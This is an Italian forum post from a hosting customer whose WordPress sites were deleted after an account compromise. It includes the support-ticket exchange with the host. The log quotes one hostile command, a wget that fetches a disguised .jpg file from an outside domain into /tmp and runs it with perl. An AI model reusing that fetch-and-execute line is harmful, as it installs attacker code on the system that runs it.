Ciao a tutti,
oggi sono stato vittima di un exploit e mi hanno cancellato TUTTI i siti ospitati su quel server.
Il supporto tecnico dopo avermi sospeso l'account per overload mi ha risposto che loro possono solo ricrearmi l'account.
Io non so praticamente nulla di sicurezza informatica, vi posto il log tra me è l'operatore del supporto tecnico, che alla fine in pratica dice che il problema è di wordpress perchè molto vulnerabile.
Vorrei capire come posso muovermi o cosa posso chiedere loro per tracciare l'attacco, per capire da dove è partito, dove e cosa ha colpito, per evitare in futuro la stessa situazione e anche per individuare se il problema di vulnerbilità è veramente di uno dei miei siti in wordpress o se è delle loro impostazioni di sicurezza.
E soprattutto per capire se è il caso di cambiare hosting!!!
Non fate caso al mio inglese tradotto con google.
Grazie anticipatamente a chi mi aiuterà a capirci qualcosa.
I siti erano tutti blog con wordpress aggiornato all'ultima versione.
Se avete bisogno di maggiori info chiedete pure.
Hi,
my account was suspended.
Can you help me?
I was the victim of an attack by a hacker?
Hello
I am seeing a suspicious process running under your account as
**sh -c wget **formula-1.updatesport.com/xml/dor.jpg -O /tmp/dor.jpg;perl /tmp/dor.jpg. Can I know what that is ?
Hello,
i don't know, I'm sure I never upload these two files
someone outside of me has made access to my account?
thanks
Hello
The account seems to have compromised and using that they are trying to compromise more account so we wont be able to enable the account without re-creating. Let us know whether we can proceed for account re-creation ?
all of my data are loss ?
i'm hacked ?
Hello
It seems your account is sompromised by exploiting some coding vulnerability associated with your pages. It needs to be re-created. Let us know if we can proceed with that.
I'm not a security expert and I did not understand what happened to all
the sites hosted on your servers.
There was a hacker attack?
Can i have the logs about what happened?
Has anyone had any possible access to my cpanel?
I lost all data from all sites?
You do not have a backup of my data?
Please let me know, we're talking about months of work and personal
information confidential.
Thanks
Hello
If the one which I mentioned above is nothing you know about then your account is compromised. The only thing we can do now is enabling it after re-creation.
I realized that I was the victim of an exploit.
I would like more information about taking legal action if possible.
You can not lose a network of websites hosted on your server and reply
with two lines
say that you can just recreate the account.
I have not received an answer to the question, "Who had access to my
cpanel?"
I have not received an answer to the question "do you have or you do not
have a backup of my home directory?"
My sites were based on simple wordpress blog, I need to get more
information to understand how to prevent future similar attacks.
The attack was directed to my site or to another domain that has also
caused damage on mine?
Thanks
Hello
Wordpress is a very vulnerable script which gets easily hacked its not an issue with the server and its the weakness of those scripts. Adding more pluggins and themes makes it even worse. If you search you will see a lot of compromised cases and even scripts of wordpress hacks. So using wordpress is always high risk. Even if you go for it we strongly recommend that you consult any developers and fix all the coding bugs and loop poles.
Since the account is hacked the recommended solution is an account re-creation and again if you are planning to use wordpress its a real risk as the script has so many known vulnerabilities which makes a heaven for hackers. Atleast check with any good developers and fix the coding bugs in it.
Since it seems to be some ind of a URL injection or something there is logs on the server. We cannot restore the backup as that may lead to a further hack as the vulnerabilities will be there still. If you want you data then get back to us with any ftp details from any other servers other than our own and we will upload the backup for you.
Thanks
Mabin